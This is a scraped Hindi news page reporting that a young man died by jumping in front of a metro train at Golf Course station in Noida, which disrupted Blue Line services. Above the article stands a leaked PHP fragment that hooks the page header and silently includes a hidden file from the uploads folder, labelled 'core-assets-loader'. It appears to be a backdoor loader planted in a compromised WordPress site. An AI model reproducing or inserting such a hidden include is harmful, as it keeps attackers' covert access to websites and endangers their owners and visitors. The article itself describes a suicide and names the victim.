add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); गोल्फकोर्स मेट्रो स्टेशन पर मेट्रो के सामने कूदा युवक, मौत – SOCH INDIA
Menu

दुनिया
गोल्फकोर्स मेट्रो स्टेशन पर मेट्रो के सामने कूदा युवक, मौत

nobanner

नोएडा के गोल्फकोर्स मेट्रो स्टेशन पर शनिवार की सुबह एक युवक मेट्रो ट्रेन के आगे कूद गया. ट्रेन के आगे कूदते ही हड़कंप मच गया. जानकारी के मुताबिक 9:15 बजे के करीब पुलिस को यह जानकारी मिली कि गोल्फ कोर्स मेट्रो स्ट्शन पर एक अज्ञात युवक ने मेट्रो ट्रेन के आगे कूदकर आत्महत्या कर ली.

सूचना के आधार मौके पर पहुंची पुलिस ने कार्रवाई शुरु की. जांच में युवक की पहचान रूपक्स पाल निवासी दिल्ली के रूप में हुई. इसकी उम्र 25 वर्ष है. पुलिस ने शव को पोस्टमॉर्टम के लिए भेज दिया है. इस हादसे के कारण ब्लू लाइन मेट्रो पर सेवाएं काफी समय तक बाधित रहीं. लोगों को आनेजाने में परेशानियों का सामना करना पड़ा. बाद में सेवाएं सामान्य हो गईं.